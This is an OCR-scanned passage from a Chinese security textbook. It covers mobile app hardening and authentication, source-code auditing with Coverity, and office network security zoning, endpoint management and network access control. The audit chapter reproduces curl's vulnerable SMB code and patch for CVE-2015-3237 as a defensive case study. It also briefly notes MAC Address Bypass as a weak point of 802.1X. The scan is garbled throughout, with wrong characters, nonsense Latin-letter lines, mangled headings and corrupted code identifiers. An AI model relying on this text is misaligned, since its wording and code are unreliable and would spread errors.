iOS 开 发 Xcode 环 境 可 使 用 整合 的 Clang Static Analyzer， 而 安 卓 Java 
代码 可 以 使 用 FindBugs 来 完成 代码 安全 审计 。 具 体 审计 范围 和 使 用 可 参 
考 之 后 第 11 章 “代码 审计 ”。 





2. 应 用 加 回 


目前 有 一 些 在 线 的 应 用 安全 加 固 服务 。 用 户 可 上 传 需要 加 固 的 应 
用 ， 服 务 器 接收 应 用 后 会 从 安全 ， 逆 问 和 调试 难度 等 方面 对 应 用 进行 评 
估 ， 并 按照 用 户 需要 提供 在 这 些 方面 完成 更 改 后 的 版 本 供 下 载 。 





10.9 ”关于 移动 认证 


为 了 方便 用 户 登 录 认 证 ， 通 种 移动 应 用 通过 保存 登录 信息 或 者 加 上 
简单 的 本 地 认证 方式 (如 手势 密码 或 者 数字 PIN 码 ) 来 使 用 户 免 于 输入 


完整 的 流程 。 


DSC ABI, BR REBUM RA aE A i UGE. RAR 
多 需要 背景 数据 收集 ， 从 第 一 次 正常 登录 时 设备 本 身 的 信息 ， 包 括 用 户 
日 常 操作 行为 收集 的 大 数据 等 。 在 发 现 异 常 时 ， 就 会 触发 完整 的 认证 过 
程 了 。 当 然 在 攻击 者 完全 控制 手机 的 情况 ， 如 果 所 有 认证 信息 的 要 素 都 
可 以 通过 手机 获取 到 ， 例 如 保存 的 认证 信息 ， 动 态 认 证 短信 等 ， 更 多 能 
够 做 到 的 也 只 有 提高 攻击 的 成 本 ， 而 不 能 完全 避免 认证 信息 的 盗用 。 














参考 资料 


https://www.owasp.org/images/c/ca/ASDC12- 


An_InDepth_Introduction_to_the_Android_Permissions_Modeland_How_to_ 
http://individual.utoronto.ca/jameshuang/PScout-CCS2012.pdf 


https://www.cert.org/secure-coding/research/mobile-standards- 


analysis.cfm? https://www.apple.com/business/docs/iOS_Security_Guide.pdf 


第 11 章 ”代码 审计 





源 代 码 审 计 是 一 种 提高 软件 安全 性 的 方法 。 在 之 前 的 章节 中 已 对 
SDL 有 所 介绍 ， 在 本 革 中 ， 更 偏 句 于 其 体操 作 。 我 们 将 了 解 一 些 代 码 审 
计 的 方法 和 工具 ， 从 人 工 到 借助 工具 ， 最 后 会 通过 一 些 实例 来 看 到 如 何 
通过 现 有 的 工具 进行 审计 ， 以 及 这 些 工具 如 何 帮 助 我 们 发 现 并 消除 漏 
洞 。 需 要 注意 的 是 ， 在 源 代码 审计 阶段 ， 一 些 产 品 安全 设计 上 的 问题 可 
能 已 经 较 难 被 发 现 和 修改 ， 代 码 审计 更 多 是 发 现代 人 码 实现 上 的 错误 和 遗 
漏 。 














在 代码 量 可 控 的 情况 下 ， 并 且 没 有 很 好 的 工具 支持 时 ， 我 们 可 以 考 
虑 通过 总 结 经 验 ， 自 己 实现 相关 的 检查 工具 。 以 找到 未 正确 过 渡 数 据 类 
型 的 漏洞 为 例 ， 定 位 问题 可 以 简单 分 为 以 下 几 个 步骤 : 1) 标注 出 高 危 
行为 入 口 函 数 2) 标注 数据 获取 来 源 3) 标注 数据 过 小 函 数 。 之 后 回 朔 调 
用 过 程 ， 添 加 简单 的 逻辑 。 


11.1 目 动 化 审计 产品 


对 于 代码 量 大 的 产品 ， 人 工 审计 明显 不 能 满足 需求 ， 这 时 需要 寻求 
工具 的 帮助 。 代 码 分 析 技 术 由 来 已 入 ，1976 年 科罗拉多 大 学 的 Lloyd 
D.Fosdick 和 Leon J.Osterweil 在 ACM Computing Surveys 上 发 表 了 著名 的 
Data Flow Analysis in Software Reliability 论 文 ， 其 中 就 提 到 了 数据 流 分 
析 、 状 态 机 系统 、 边 界 检测 、 数 据 类 型 验证 、 控 制 流 分 析 等 技术 。 随 着 
计算 机 语言 的 不 断 演 进 ， 代 码 分 析 技术 也 在 日 趋 完善 。 目 前 有 数量 众多 
的 开源 和 商业 源码 审计 工具 建立 在 这 些 分 析 技 术 之 上 ， 其 中 包括 
Foritify，Coverity，FindBugs 等 。 这 些 自动 化 的 代码 审计 产品 能 够 满足 
对 审计 量 和 强度 的 要 求 ， 并 且 大 多 提供 和 开发 环境 相 整 合 的 组 件 ， 可 以 
融入 到 日 常 的 开发 和 编译 过 程 当 中 。 工 具 不 可 避免 会 产生 漏 报 和 误 报 ， 
在 处 理工 具 生成 的 报告 时 ， 需 要 人 工 对 生成 的 结果 进行 验证 。 

















11.2 Coverity 


Coverity 是 斯 坦 福 大 学 Dawson Engler 教 授 和 他 的 三 个 学 生发 起 完成 
的 代码 审计 工具 ， 目 前 为 包括 NASA 等 500 多 个 公司 或 政府 部 门 提供 服 
务 。 选 择 其 为 例 的 原因 有 : D 在 具体 的 使 用 中 感 党 误 报 率 相 对 较 少 2) 
目前 有 免费 针对 开源 代码 审计 的 服务 3) 可 以 找到 相关 的 原型 论文 。 
Coverity 文 持 的 语言 有 C，C++ 和 Java， 支 持 发 现 的 问题 类 型 包括 : 


‘resources leaks 

‘dereferences of NULL pointers 
‘incorrect usage of APIs 

‘use of uninitialized data 
‘memory corruptions 

‘buffer overruns 

‘control flow issues 

-error handling issues 


-incorrect expressions 


‘concurrency issues 
‘insecure data handling 
‘unsafe use of signed values 


-use of resources that have been freed 


以 C/C++ 为 例 ，Coverity 的 分 析 引 擎 Prevent 包 含 以 下 的 组 件 和 功能 
参见 表 11-1。 


表 11-1 ”Coverity 的 分 析 引 擎 Prevent 包 含 的 组 件 和 功能 



































引擎 功能 
路 径流 程 引擎 通过 构建 一 个 表示 经 过 每 一 个 函数 的 所 有 的 路 径 的 图 表 分 析 代 码 中 的 每 个 函数 的 
控制 流 
数据 追踪 引擎 用 于 分 析 从 程序 中 每 个 路 径 中 的 声明 收集 的 所 有 的 整 型 和 布尔 型 等 数据 
统计 引擎 用 于 分 析 代 码 作 为 一 个 整体 的 行为 特征 
( 续 ) 
引擎 功能 
过 程 间 调 用 总 结 引擎 一 个 主要 的 创新 ， 使 得 Prevent 可 以 执行 整个 程序 的 分 析 ， 分 析 文 件 问 和 模块 间 
的 任何 层次 的 复杂 的 调用 链 
类 型 流程 引擎 用 于 提高 C++ 分 析 中 依赖 于 类 层次 关系 的 报告 的 结果 的 精度 
虚假 路 径 引 擎 用 于 分 析 每 个 分 支 条 件 ， 以 确定 在 当前 路 径 它 将 是 真 、 假 或 不 确定 
加 速 引擎 保存 横越 每 个 路 径 时 的 每 个 缺陷 分 析 所 收集 的 信息 ; 消除 元 余 路 径 ， 不 需要 横越 
任何 不 必要 的 路 径 来 找到 最 多 的 缺陷 
数据 传播 引擎 把 过 程 间 调 用 总 结 引 擎 产生 的 所 有 总 结 和 数据 追踪 引擎 记录 的 所 有 数据 汇总 起 来 ， 
是 Coverity 特有 的 、 上 下 文敏 感 的 过 程 间 分 析 能 力 的 关键 
增 量 分 析 引 擎 通过 缓存 分 析 数 据 来 提高 性 能 ， 以 便 后 续 的 分 析 仅 需要 包含 变化 的 数据 








如 有 果 想 看 到 实际 Coverity 运 行 的 结果 ， 可 以 在 scan.coverity.com 上 浏 
览 一 些 针 对 开源 软件 进行 的 审计 结果 ， 目 前 已 经 有 为 数 众 多 的 开源 软件 


通过 Coverity 提 高 代码 安全 质量 。 图 11-1 是 某 个 开源 项 目的 输出 结果 。 
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图 11-1 输出 结 


https://scan.coverity.com/o/oss_success_stories 中 包含 甄选 出 通过 
Coverity 发 现 的 漏洞 列表 ， 如 图 11-2 所 示 。 


点 击 View Defect 可 以 看 到 详细 问题 描述 ， 现 在 以 一 个 curl (一 个 利 
用 URL 语 法 在 命令 行 方式 下 工作 的 开源 文件 传输 工具 ) 中 的 漏洞 作为 例 
子 进 行 查 看 针对 某 问题 的 具体 展示 结 








https://scan.coverity.com/o/oss_success_stories/46 ， 如 图 11-3 所 示 。 


COVERITY SSS 





COPY_PASTE_ERROR Incorrect expression Setting an incorrect jump target leads to a certain 
crash if the code is exercised. Interestingly enough, 
this is a tiny corner case that was (obviously) NOT 
exercised in our... 


Jul 21, 2015 Impact is low, just wanted to commend you! It would 
cause game actors to teleport to the wrong 


coordinates... 


Jul 08, 2015 Memory - illegal accesses = in this case, we're using a pointer to memory which is 
not guaranteed to be zero, and potentially corrupting 
the malloc arena in the process. Fixed by setting name 





图 11-2 ”漏洞 列表 





Project Name CID Checker Category Developer Description 


curl 1299430 TAINTED_SCALAR Insecure This turned out to be a security flaw, now known as CVE-2015-3237. Full 
data description here: http://curl.haxx.se/docs/adv_20150617B.html It could make a 
handling malicious server fool a client to send off data from memory it didn't intend to. 











len = Curl _readl6_le(((unsigned char *) msg) + 
sizeof(struct smb header) + 11); 

off = Curl_readi6_le(((unsigned char *) msg) + 
sizeof(struct smb header) + 13); 





<< 8. Casting narrower unsigned “len” to wider signed type “int” effectively tests its lower bound. 


<< 10. Checking lower bounds of unsigned scalar "len" by “len > 6". 





if(len > Ø) { 


result -~ Curl_client_write(conn, 
(char *)msg + off + sizeof(unsigned int), 
len); 





图 11-3 ”详细 问题 描述 





这 是 一 个 存在 于 curl 中 的 信息 泄露 漏洞 。 由 于 没有 对 SMB 服 务 端 返 
回 的 长 度数 据 进 行 合法 性 检查 ， 通 过 构造 特定 网 络 包 数 据 ， 将 导致 curl 
客户 端 发 送出 非 预期 的 数据 ， 导 致 信 息 泄 露 。 该 漏洞 也 已 被 修复 ， 分 配 
的 CVE 编 号 为 CVE-2015-3237， 公 告 见 
http://curl.haxx.se/docs/adv_20150617B.html 。 下 面 是 Coverity 给 出 的 函数 
中 漏洞 触发 流程 。 





696 *done = true; 

697 break; 

698 

699 default: 

700 smb_pop_message(conn); 

701 return CURLE_OK; /* ignore */ 

702 } 

703 

704 smb_pop_message(conn); 

705 

706 return CURLE_OK; 

707 } 

708 

709 static CURLcode smb_request_state(struct connectdata *conn, bool *done) 
710 { 

711 struct smb_request *req = conn->data->req.protop; 
712 struct smb_header *h; 

713 enum smb_req_state next_state = SMB_DONE; 
714 unsigned short len; 

715 unsigned short off; 

716 CURLcode result; 

717 void *msg = NULL; 

718 

719 /* Start the request */ 


< 1. Condition "req->state == SMB REQUESTING", taking false branch 


721 if(req->state == SMB_REQUESTING) { 

722 result = smb_send_tree_connect(conn) ; 

723 if(result) { 

724 connclose(conn, "SMB: failed to send tree connect message"); 
725 return result; 

726 } 

727 

728 request_state(conn, SMB_TREE_CONNECT); 

729 } 

730 

731 /* Send the previous message and check for a response */ 


result = smb_send_and_recv(conn, &msg); 
< 2. Condition "result", taking false branch 
732 if(result && result != CURLE_AGAIN) { 
733 connclose(conn, "SMB: failed to communicate"); 
734 return result; 


735 


< 3. Condition "!msg", taking false branch 


737 
738 
739 
740 


if(!msg) 
return CURLE_OK; 


h = msg; 


< 4. Switch case value "SMB_DOWNLOAD" 
switch(req->state) { 


742 
743 
744 
745 
746 
747 
748 
749 
750 
751 
752 
753 
754 
755 
756 
757 
758 
759 
760 
761 
762 
763 
764 
765 
766 
767 
768 
769 
770 
771 
772 
773 
774 
775 


case SMB_TREE_CONNECT: 

if(h->status) { 
req->result = CURLE_REMOTE_FILE_NOT_FOUND; 
if(h->status == Smb_swap32(SMB_ERR_NOACCESS ) ) 

req->result = CURLE_REMOTE_ACCESS_DENIED; 

break; 

} 

req->tid = smb_swapi6(h->tid); 

next_state = SMB_OPEN; 

break; 








case SMB_OPEN: 

if(h->status) { 
req->result = CURLE_REMOTE_FILE_NOT_FOUND; 
next_state = SMB_TREE_DISCONNECT,; 
break; 

} 

req->fid = smb_swap16(((struct smb_nt_create_response *)msg)->fid); 

conn->data->req.offset = 0; 

if(conn->data->set.upload) { 
conn->data->req.size = conn->data->state.infilesize; 
Curl_pgrsSetUploadSize(conn->data, conn->data->req.size); 
next_state = SMB_UPLOAD; 

} 

else { 
conn->data->req.size = 

smb_swap64(((struct smb_nt_create_response *)msg)->end_of_file); 

Curl_pgrsSetDownloadSize(conn->data, conn->data->req.size); 
next_state = SMB_DOWNLOAD; 

} 


break; 





case SMB_DOWNLOAD : 


< 5. Condition "h->status", taking false branch 


776 
777 
778 
779 
780 


if(h->status) { 
req->result = CURLE_RECV_ERROR; 
next_state = SMB_CLOSE; 
break; 


<<< CID 1299430: Insecure data handling TAINTED_SCALAR 


<<< 6. Function "Curl_readi6_le" returns tainted data. 

<< 7. Assigning: "len" = "Curl_readi6_le", which taints "len". 

781 

782 len = Curl_readi6_le(((unsigned char *) msg) + 

783 sizeof(struct smb_header) + 11); 
785 off = Curl_readi6_le(((unsigned char *) msg) + 


sizeof(struct smb_header) + 13); 


<< 8. Casting narrower unsigned "len" to wider signed type "int" effectively tests 
< 9. Condition "len > ©", taking true branch 
<< 10. Checking lower bounds of unsigned scalar "len" by "len > 0". 


785 


if(len > 0) { 
<<< CID 1299430: Insecure data handling TAINTED_SCALAR 
<<< 11. Passing tainted variable "len" to a tainted sink. 


786 

787 result = Curl_client_write(conn, CLIENTWRITE_BODY, 

788 (char *)msg + off + sizeof(unsigned int! 

789 len); 

790 if(result) { 

791 req->result = result; 

792 next_state = SMB_CLOSE; 

793 break; 

794 } 

795 } 

796 conn->data->req.bytecount += len; 

797 conn->data->req.offset += len; 

798 Curl_pgrsSetDownloadCounter(conn->data, conn->data->req.bytecount) ; 

799 next_state = (len < MAX_PAYLOAD_SIZE) ? SMB_CLOSE : SMB_DOWNLOAD; 
break; 

800 

801 case SMB_UPLOAD: 

802 if(h->status) { 

803 req->result = CURLE_UPLOAD_FAILED; 

804 next_state = SMB_CLOSE; 

805 break; 

806 

807 len = Curl_readi6_le(((unsigned char *) msg) + 

808 sizeof(struct smb_header) + 5); 

809 conn->data->req.bytecount += len; 

810 conn->data->req.offset += len; 

811 Curl_pgrsSetUploadCounter(conn->data, conn->data->req.bytecount ) ; 

812 if(conn->data->req.bytecount >= conn->data->req.size) 





可 以 看 到 在 满足 以 上 代码 数字 开头 的 条 件 后 ， 即 可 触发 该 漏洞 ， 简 
化 的 流程 如 下 : 





smb_request_state. 


len = Curl_readi6_le(.. 


j= 


Curl_client_write(.. 


, len) 





Curl Pig MARS im Be EE BT LE hlen E, ZA AN 


检查 便 将 len 作 为 长 度 参数 传 入 Curl_client_write 函 数 : 





CURLcode Curl_client_write(struct connectdata *conn, 
int type, 
char *ptr, 
size_t len) 





Curl_client_write 会 将 ptr 指 针 后 的 len 字 节 数 据 发 送 给 服务 端 ， 即 使 
len 超 过 预期 的 数据 包 长 度 。 








Curl 新 版 本 中 针对 这 个 漏洞 的 补丁 中 增加 了 对 len 的 长 度 检 查 ， 计 算 
后 的 值 不 能 超过 已 收 到 的 smb 数 据 包 的 边界 (smb->got) 。 
Chttp://curl.haxx.se/CVE-2015-3237.patch ) : 





lib/smb.c | 12 +++++++++--- 
1 file changed, 9 insertions(+), 3 deletions(-) 
diff --git a/lib/smb.c b/lib/smb.c 
index 8cb3503..d461a71 100644 
--- a/lib/smb.c 
+++ b/1lib/smb.c 
@@ -781,13 +781,19 @@ static CURLcode smb_request_state(struct connectdata *conn, 
bool *done) 
len = Curl_readi6_le(((unsigned char *) msg) + 
sizeof(struct smb_header) + 11); 
off = Curl_readi6_le(((unsigned char *) msg) + 
sizeof(struct smb_header) + 13); 
if(len > 0) { 
- result = Curl_client_write(conn, CLIENTWRITE_BODY, 
- (char *)msg + off + sizeof(unsigned int), 
len); 
struct smb_conn *smbc = &conn->proto.smbc; 
if(off + sizeof(unsigned int) + len > smbc->got) { 
failf(conn->data, "Invalid input packet"); 
result = CURLE_RECV_ERROR; 
} 
else 
result = Curl_client_write(conn, CLIENTWRITE_BODY, 
(char *)msg + off + sizeof(unsigned int), 
len); 


二 十 十 十 十 二 十 十 十，! 


if(result) { 
req->result = result; 
next_state = SMB_CLOSE,; 
break; 


} 





至 此 ， 从 这 个 漏洞 分 析 过 程 ， 我 们 可 以 了 解 到 Coverity 审 计 的 实际 
效果 。 


第 12 章 “办公 网 络 安全 





办 公 网 络 的 安全 是 乙方 安全 公司 提供 解决 方案 最 多 的 场景 。 这 里 之 
所 以 介绍 办 公 网 络 安全 ， 主 要 因为 现在 社会 工程 学 、 定 回 攻 击 、APT、 
钓鱼 、 水 坑 攻 击 ， 专 打 管 理 员 的 渗透 越 来 越 多 ， 所 以 生产 网 络 做 到 固 知 
金汤 也 无 用 ， 攻 击 者 绕 背 后 转 跳 办 公 网 络 进攻 也 是 一 个 很 大 的 问题 。 








为 一 方面 服务 器 网 络 大 多 是 来 自 客 户 - 服 务 端 相对 固化 的 交互 模 
型 ， 用 严格 的 ACL 束 能 控制 绝 大 多 数 行为 ， 但 是 办 公 网 络 却 不 一 样 ， 大 
量 的 客户 端 行为， 人 的 鼠标 上 点击， 运行 各 种 程序 ， 访 问 各 种 URL 都 无 法 
预测 ， 所 以 办 公 网 络 的 解决 方案 完全 不 同 于 生产 网 络 ， 基 本 可 以 当 作 两 
件 事情 来 对 待 。 


12.1 文化 问题 








乙方 安全 公司 的 针对 办 公 的 解决 方案 虽 多 ， 但 在 互联 网 行业 很 多 都 
不 适用 ， 主 要 是 因为 文化 差异 。 传 统 行 业 为 了 防止 PT 或 APT， 防 止 信息 
iik MEARE ARRAI) ， 可 以 用 比较 严 奇 的 “控制 型 "管理 
手段 ， 但 在 互联 网 行业 ， 互 联网 精神 的 本 质 就 是 开放 和 共享 ， 产 品 经 
理 ，UED 设 计 都 需要 大 量 的 借鉴 苑 品 ， 大 多 数 职能 都 或 多 或 少 的 与 用 户 
体验 相关 ， 需 要 频 索 地 从 互联 网 取材 ， 程 序 员 知 不能 google 简 直 想 离职 
的 心 都 有 了 ， 如 采用 强 封 墙 和 严 策 略 的 手段 在 技术 上 能 解决 问题 ， 但 在 
文化 上 可 能 会 下 到 强烈 抵制 而 无 法 落地 ， 甚 至 被 吴 笑 “ 一 夜 从 香港 回 到 
朝鲜 ”。 











很 多 乙方 公司 觉得 办 公 类 的 安全 产品 在 互联 网 行业 卖 不 太 动 ， 其 实 
这 个 问题 与 甲 方 是 否 目 研 无 关 ， 主 要 还 是 体验 问题 ， 能 保障 办 公 体 验 就 
OK, WEA S WARE. 








12.2 Samy 


图 12-1 所 示 的 安全 域 划 分 方式 是 对 大 型 的 组 织 而 言 ， 中 小 型 企业 不 
需要 如 此 麻烦 。 首 先 办 公 网 络 的 服务 器 和 用 户 架 面 环境 必须 划分 独立 安 
全 域 ， 即 便 是 中 小 企业 这 个 需求 也 算是 最 基本 的 。 随 着 组 织 规模 的 扩大 





化 ， 办 公 内 服务 器 资产 超过 一 定量 级 的 情况 下 ， 服 务 器 域内 也 需要 单独 
划 更 细 的 安全 域 : 


OA 服务 器 域 事业 部 A 桌面 域 事业 部 B 桌面 域 
一 


运营 、 市 场 、 媒 体 等 





图 12-1 ”办 公 网 络 安全 域 示 意图 


:涉及 内 部 经 营 信息 泄露 的 办 公 类 服务 器 ， 如 邮件 、 人 力 资 源 系 
统 、 财 务 类 系统 。 


涉及 研发 体系 持续 集成 和 代码 托管 等 代码 资产 的 。 


:涉及 运 维 类 资产 管理 的 ， 攻 击 者 可 以 轻易 获取 所 有 服务 器 列表 其 
至 SSH 口 令 的 。 


awe 


安全 优先 级 不 算 太 高 的 测试 类 、 杂 项 资源 。 


对 于 员工 的 桌面 环境 ， 可 以 按 职能 划 安全 子 域 ， 中 小 企业 可 以 按 部 
门 划 动态 van。 从 策略 维度 看 桌面 域内 部 用 户 可 以 分 为 几 类 ; 


运 维 、 开 发 等 技术 职能 属于 重度 PC 用 户 ， 对 网 络 、 主 机 性 能 等 要 
求 最 高 ， 如 果 对 他 们 实施 过 于 严格 的 安全 宋 略 ， 一 定 会 受到 强烈 的 抵 
抗 ， 而 且 大 多 是 正 币 业务 需求 ， 你 没 法 压制 这 些 需求 。 








-在 典型 的 技术 重度 用 户 中 ， 研 发 属于 比较 特殊 的 一 类 ， 既 需要 灵 
活 ， 义 需要 防止 源 代码 泄露 ， 需 要 单独 夯 一 个 疾 ， 把 他 们 放 进 去 。 





-市场 运 营 这 些 属于 中 度 PC 用 户 ，PC 是 他 们 的 办 公 工 具 ， 以 文档 、 
网 页 、 视 频 、 体 验 苋 品 之 类 的 为 主 ， 对 用 户 体 验 有 一 定 的 要 求 ， 但 不 会 
像 运 维 开发 那样 对 系统 限制 百般 挑剔 ， 能 够 适应 一 定 的 限制 性 安全 策略 
而 不 会 产生 很 大 的 阻力 。 











客服 、 线 下 推广 等 职能 ， 属 于 轻 度 PC 用 户 ， 尽 管 网 洲 类 的 客服 可 
能 整 天 挂机 泡 在 游戏 中 ， 但 在 安全 的 视角 上 仍 归 属于 轻 度 用 户 ， 他 们 的 
办 公 需 求 比 较 单 一 ， 大 多 数 只 需要 用 一 些 邮 件 和 类 似 CRM 的 系统 ， 不 








需要 太 多 主观 上 的 安装 新 软件 和 对 系统 变更 之 类 的 交互 ， 甚 至 对 性 能 要 
求 不 高 ， 在 管理 上 可 以 实施 较 严 格 的 安全 策略 。 











办 公 内 的 安全 域 一 方面 是 为 了 隔离 威胁 ， 画 一 方面 是 为 了 把 安全 域 
作为 实施 安全 策略 的 最 小 分 组 单元 ， 以 便于 对 不 同 的 单元 附加 不 同 的 党 
略 。 


12.3 Aine 


终端 管理 是 办 公安 全 中 最 大 的 一 环 ， 市 场 上 有 很 多 解决 方案 中 ， 安 
全 公司 集中 了 大 量 的 优势 兵力 在 这 个 方面 ， 推 出 了 不 少 商业 产品 ， 对 于 
绝 大 多 数 企 业 而 言 ， 在 这 个 方面 不 会 跟 生 产 网 络 一 样 涉及 “上 自 研 ” 这 个 话 
题 ， 基 本 上 都 是 围绕 商业 产品 展开 ， 当 然 也 有 极 少数 例外 。 














1. 补 丁 管理 





补丁 管理 可 能 是 当下 被 认为 没 太 多 技术 含量 ， 但 很 基础 的 一 环 ， 大 
多 数 办 公 宋 面 都 是 以 微软 的 Windows 操 作 系 统 为 主 ， 所 以 补丁 管理 多 数 
依靠 儿 个 方面 : 





.微软 自身 解决 方案 中 的 SCCM (WSUS/SMS 蔡 代 品 ， 支 持 Linux 和 
OSX) ， 如 图 12-2 所 示 。 


.利用 第 三 方 终端 管理 软件 中 附带 的 补丁 推送 功能 
2. 组 策略 (GPO) 


组 策略 的 作用 主要 在 于 实施 一 些 “ 基 本 的 ”安全 策略 。 例 如 人 允许 客户 
端 运 行 软件 的 黑白 名 单 、 系 统 配置 选项 ，USB 权 限 管理 等 。 






管理 端 ， 由 SCCM 服务 器 
Nw 和 活动 目录 服务 器 组 成 
活动 目录 服务 
被 管理 端 
PC Tablet PC 终端 设备 手机 笔记 本 服务 器 


图 12-2” SCCM 架构 


在 禁用 软件 时 也 有 一 些 技巧 ， 比 如 禁用 QQ， 可 以 禁用 它 运行 所 需 
要 的 DLL， 这 样 有 些 黑客 的 小 伎俩 就 不 管用 了 。 


图 12-3 包 含 了 一 些 典 型 的 组 策略 。 
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图 12-3 组 策略 界面 


3. 终 端 HIPS (AV) 


前 360 自 产 PC 端 安全 卫士 、360 杀 毒 ， 腾 讯 自 产 PC 管 家 ， 百 度 自 
产 百 度 杀毒 产品 ， 除 此 之 外 ， 其 他 厂商 基本 在 这 个 问题 上 都 不 具备 太 多 
选择 能 力 。 上 卡巴、 诺顿、 趋势 这 些 都 是 现成 的 产品 ， 基 本 也 不 定制 ， 再 
深究 其 技术 也 意义 不 大 ， 因 为 只 是 跟 提 供 该 产品 的 乙方 安全 厂商 有 关 ， 
跟 甲 方 实则 无 太 大 关系 。 甲 方 唯一 要 做 的 就 是 选 型 ， 然 后 买 。 


m 











4. 网 络 准 入 NAC 


目前 主流 的 网 络 准 入 主要 有 两 种 方式 : 802.1X， 基 于 终端 管理 软件 
的 C/S 模 式 认 证 。 在 实施 NAC 方 案 之 前 ， 需 要 在 安全 域 划 分 时 划 出 guest 
vlan， 没 有 通过 认证 的 客户 端 一 律 丢 到 guest vlan 去 。 





网 络 准 入 认证 示意 图 如 图 12-4 所 示 。 


Internet-Only 





图 12-4 网 络 准 入 认证 示意 图 











这 种 方案 是 最 第 见 的 网 络 准 入 ， 前 所 是 所 有 的 交换 机 都 支持 
802.1X。 但 并 非 押 有 的 客户 端 设备 部 文 持 802.1x， 例 如 打印 机 ， 所 以 





802.1x 有 一 个 扩展 叫 MAB (Mac Address Bypass) ， 如 果 客 户 端 无 法 提 
供 userpassword 的 认证 方式 则 以 设备 自身 的 MAC 地 址 作为 认证 ， 这 对 于 
有 心 的 攻击 者 而 言 就 是 很 好 的 绕 过 点 ， 即 使 那些 机 器 都 锁 屏 ， 获 取 那 些 
己 通 过 认证 的 设备 的 MAC 地 址 也 并 非 难事 。 


C/S 模 式 认证 如 下 : 


.基于 终端 管理 软件 实现 的 NAC 跟 802.1x 也 类 似 ， 没 有 通过 认证 的 客 
户 端 被 服务 端 以 tcpkil 等 方式 “足下 线 ”。 


合 认证 的 意义 在 于 ， 当 802.1x 被 突破 时 ， 还 有 一 层 认 证 做 后 备 。 


12.4 ”安全 网 关 


办 公 网 络 的 网 关 类 设备 五 花 八 门 ， 但 总 体 上 党 得 不 如 生产 网 络 的 网 
天 设备 作用 那么 大 。 


1.NGFW/FW 


下 一 代 防 火 墙 如 果 是 类 似 UTM 的 大 杂烩 ， 对 中 小 企业 可 能 有 用 ， 
但 在 APT 兴 起 的 年 代 ， 对 办 公 网 络 内 的 比较 隐秘 的 攻击 可 能 都 没 大 用 ， 
如 果 用 NGFW 的 设计 与 实现 上 采用 了 联合 威胁 情报 的 大 数据 做 判断 的 方 
法 ， 例 如 IP 地 址 URL 砍 名 单 库 ， 相 对 来 说 会 有 更 积极 的 意义 。 


2.UTM/ 反 病毒 网 关 /NIPS/ 反 垃圾 邮件 


基于 应 用 层 协议 扫描 和 碍 杀 ， 网 天 设 备 为 7 层 协议 提供 实时 扫描 和 
防护 的 功能 因为 涉及 性 能 问题 在 生产 网 络 的 应 用 面 都 比较 罕 ， 但 在 办 公 
网 络 还 是 有 比较 大 的 销售 价值 。 如 果 要 深究 具体 效果 如 何 ， 默 认 配 置 可 

能 不 会 效果 太 强 ， 仍 需 上 自己 动手 加 集 略 。 


3.48 


HBP 


机 


堡垒 机 虽然 部 嗜 在 办 公 网 络 的 网 关 处 ， 但 主要 为 生产 网 络 的 远程 接 


入 提供 行为 审计 。 


4. 行 为 审计 





行为 审计 主要 是 对 员工 上 网 行为 做 审计 ， 有 些 设备 对 明文 协议 甚至 
征 可 破解 的 加 密 协 议 提供 了 截取 和 存储 的 功能 ， 一 方面 给 公安 部 门 要 求 
的 反动 政治 言论 提供 治理 的 证 据 ， 另 一 方面 也 给 喜欢 监控 员工 行为 、 控 
制 欲 极 强 的 老板 们 提供 了 便利 的 渠道 。 当 然 对 于 抓 内 鬼 ， 商 业 间 恋 等 也 
有 一 些 作用 。 











其 他 的 产品 〈 例 如 DLP、 抗 APT、 大 数据 探 针 ) 可 能 都 会 涉及 网 关 
设备 ， 但 是 对 一 个 企业 而 言 ， 一 个 出 口 要 堆 矫 N 层 设备 (包含 旁 路 ) 显 
然 是 不 合理 ， 具 体 取 舍 就 看 使 用 的 场景 和 对 安全 的 理解 了 。 


12.5 研发 管理 








传统 行业 不 一 定 有 这 个 环节 ， 对 于 互联 网 行业 而 言 研发 运 维 皆 属 标 
配 职能 。 对 研发 的 管理 是 挑战 比较 大 的 工作 ， 因 为 它 既 需要 保证 便利 和 
用 户 体验 ， 又 有 比较 强 的 安全 需求 ， 两 者 一 定 程 度 上 古巴 盾 的 ， 毕 合 来 
说 目前 业内 还 没有 完美 解决 方案 。 下 面 介绍 两 种 目前 常用 的 方法 。 








1. 防 泄密 








研发 体系 往往 涉及 知识 产权 和 机 密 数 据 ， 尺 管 不 是 所 有 的 源 代码 洪 
露 都 会 造成 经 营 危 机 ， 比 如 就 算 给 你 QQ 的 源 代码 你 也 无 法 建立 腾讯 芝 
国 ， 因 为 这 种 商业 上 的 成 功 已 经 是 一 个 生态 级 别 的 综合 因素 ， 而 不 是 一 
个 单纯 的 技术 壁 侄 问题 。 但 人 们 习惯 上 还 是 把 源 代 码 归 入 保密 范畴 。 当 
然 也 有 一 些 业 务 ， 比 如 大 型 网 游 ， 如 果 源 代码 和 游戏 内 的 数值 设 定 部 洪 
露 了 ， 换 皮 复 制 一 球 游戏 的 门槛 并 不 高 ， 很 快 就 会 侵害 原 产 品 的 利益 。 
同时 ， 源 代码 泄露 还 会 加 速 外 挂 的 泛滥 ， 以 及 bug 的 流行 ， 对 产品 本 号 
来 说 确实 影响 比较 大 。 











从 安全 的 角度 讲 所 有 类 型 产品 的 源 代 码 诬 露 都 会 加 速 漏洞 挖掘 的 过 
程 ， 不 管 广 商 在 公开 场合 表示 如 何以 开放 的 心态 面 对 漏 洞 披露 ， 实 际 上 
所 有 漏洞 对 目 身 的 利益 都 会 有 所 损害 ， 所 以 这 些 多 少 都 会 成 为 公司 防洪 
密 的 原始 驱动 力 所 在 。 








一 般 情 况 下 会 给 研发 配 两 台 PC， 一 台 能 畅游 互联 网 随心 所 欲 ， 另 
一 台 则 用 于 coding 不 能 访问 互联 网 ， 个 别 需 要 复制 粘贴 的 资源 通过 服务 
需 的 共享 文件 夹 来 中 转 ， 或 者 使 用 其 他 方式 实现 双 机 甬 切 板 共 胖 。 两 台 
PC 属于 不 同 的 vlan， 之 间 不 能 互 访 ， 但 都 可 以 访问 中 转 服务 器 。 图 12-5 
古 一 个 简单 的 示例 。 
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图 12-5 ”研发 环境 访问 控制 示意 图 


在 物理 安全 上 ， 硅 胶 封 USB 实 际 上 不 是 太 管 用 ， 那 玩意 儿 容 易 挥 ， 
最 好 的 方法 还 是 机 箱 上 锁 ， 组 策略 中 骏 用 USB 的 数据 传输 功能 ， 保 留 忌 
标 、 画 图 板 和 充电 的 功能 。 





2. 源 代码 管理 


原则 上 源 代 码 管理 一 定 是 在 公司 层面 有 统一 的 持续 集成 和 代码 托管 
